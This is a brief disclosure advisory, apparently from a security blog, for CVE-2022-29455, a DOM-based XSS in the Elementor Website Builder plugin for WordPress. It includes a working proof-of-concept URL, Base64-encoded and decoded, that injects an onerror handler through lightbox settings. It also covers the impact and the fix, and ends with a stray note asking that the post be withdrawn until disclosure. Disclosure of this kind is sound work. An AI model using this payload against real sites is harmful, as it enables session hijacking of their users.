– The DOM-based Reflected Cross-Site Scripting (XSS) vulnerability is in Elementor’s Elementor Website Builder plugin <= 3.5.5 versions.
This issue leads to: CVE 2022-29455
4websecurity.com already reported the vulnerability to tens of thousands websites that are using WordPress and this version of the plugin.
Reference:
– https://nvd.nist.gov/vuln/detail/CVE-2022-29455
– https://rotem-bar.com/hacking-65-million-websites-greater-cve-2022-29455-elementor
– https://www.rotem-bar.com/elementor
* POC (Proof Of Concept):
The payload is Base64 encoded:
https://example.com/#elementor-action:action=lightbox&settings=eyJ0eXBlIjoidmlkZW8iLCJ1cmwiOiJodHRwOi8vIiwidmlkZW9UeXBlIjoiaG9zdGVkIiwidmlkZW9QYXJhbXMiOnsib25lcnJvciI6ImFsZXJ0KGRvY3VtZW50LmRvbWFpbikifX0=
Decoded from Base64:
https://example.com/#elementor-action:action=lightbox&settings={“type”:”video”,”url”:”http://”,”videoType”:”hosted”,”videoParams”:{“onerror”:”alert(document.domain)”}}
Impact:
XSS can cause a variety of problems for the end user that range in severity from an annoyance to complete account compromise. The most severe XSS attacks involve disclosure of the user’s session cookie, allowing an attacker to hijack the user’s session and take over the account.
Fix: Update the Plugin to latest version!
Alex,
kindly remove this post before disclosure period is over for submitted vunerability.